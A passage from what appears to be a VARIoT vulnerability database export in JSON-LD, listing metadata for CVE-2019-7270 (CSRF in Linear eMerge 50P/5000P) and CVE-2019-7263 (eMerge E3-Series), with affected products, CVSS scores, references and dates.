        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0171",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge 50p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "4.6.07"
          },
          {
            "model": "linear emerge 5000p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "4.6.07"
          },
          {
            "model": "linear emerge 5000p",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge 50p",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006017"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7270"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_50p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.6.07",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_50p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_5000p_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.6.07",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_5000p:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7270"
          }
        ]
      },
      "cve": "CVE-2019-7270",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": true,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Medium",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 6.8,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2019-7270",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.9,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "VHN-158705",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7270",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7270",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-093",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158705",
                "trust": 0.1,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2019-7270",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158705"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7270"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006017"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7270"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-093"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge 50P/5000P devices allow Cross-Site Request Forgery (CSRF). Nortek Security \u0026 Control Linear eMerge 50P/5000P is a browser-based access control security control system developed by Nortek Security \u0026 Control Company in the United States. The vulnerability stems from the WEB application not adequately verifying that the request is from a trusted user. An attacker could exploit this vulnerability to send unexpected requests to the server through an affected client",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7270"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006017"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158705"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7270"
          }
        ],
        "trust": 1.8
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7270",
            "trust": 2.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-20-184-01",
            "trust": 1.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006017",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-093",
            "trust": 0.7
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2294",
            "trust": 0.6
          },
          {
            "db": "NSFOCUS",
            "id": "47252",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158705",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7270",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158705"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7270"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006017"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7270"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-093"
          }
        ]
      },
      "id": "VAR-201907-0171",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158705"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2023-12-18T13:23:40.489000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/"
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/live-hack-cve/cve-2019-7270 "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2019-7270"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006017"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-352",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158705"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006017"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7270"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://www.applied-risk.com/resources/ar-2019-006"
          },
          {
            "trust": 1.8,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 1.8,
            "url": "https://www.us-cert.gov/ics/advisories/icsa-20-184-01"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7270"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7270"
          },
          {
            "trust": 0.6,
            "url": "http://www.nsfocus.net/vulndb/47252"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2294/"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/352.html"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/live-hack-cve/cve-2019-7270"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158705"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7270"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006017"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7270"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-093"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-158705"
          },
          {
            "db": "VULMON",
            "id": "CVE-2019-7270"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006017"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7270"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-093"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158705"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-7270"
          },
          {
            "date": "2019-07-08T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006017"
          },
          {
            "date": "2019-07-02T17:15:12.397000",
            "db": "NVD",
            "id": "CVE-2019-7270"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-093"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158705"
          },
          {
            "date": "2022-10-14T00:00:00",
            "db": "VULMON",
            "id": "CVE-2019-7270"
          },
          {
            "date": "2019-07-08T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-006017"
          },
          {
            "date": "2022-10-14T01:10:50.050000",
            "db": "NVD",
            "id": "CVE-2019-7270"
          },
          {
            "date": "2020-07-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-093"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-093"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge 50P/5000P Device cross-site request forgery vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-006017"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "cross-site request forgery",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-093"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0164

    Vulnerability from variot - Updated: 2023-12-18 13:08

    Linear eMerge E3-Series devices have a Version Control Failure. Linear eMerge E3 Series devices contain source code vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0164",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge elite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge essential",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge elite",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge essential",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005911"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7263"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7263"
          }
        ]
      },
      "cve": "CVE-2019-7263",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 10.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2019-7263",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-158698",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7263",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7263",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-101",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158698",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158698"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005911"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7263"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-101"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge E3-Series devices have a Version Control Failure. Linear eMerge E3 Series devices contain source code vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7263"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005911"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158698"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7263",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005911",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-101",
            "trust": 0.7
          },
          {
            "db": "VULHUB",
            "id": "VHN-158698",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158698"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005911"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7263"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-101"
          }
        ]
      },
      "id": "VAR-201907-0164",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158698"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2023-12-18T13:08:02.875000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "eMerge E3-Series Access Control",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005911"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-18",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158698"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005911"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7263"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 1.7,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7263"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7263"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158698"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005911"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7263"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-101"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-158698"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005911"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7263"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-101"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158698"
          },
          {
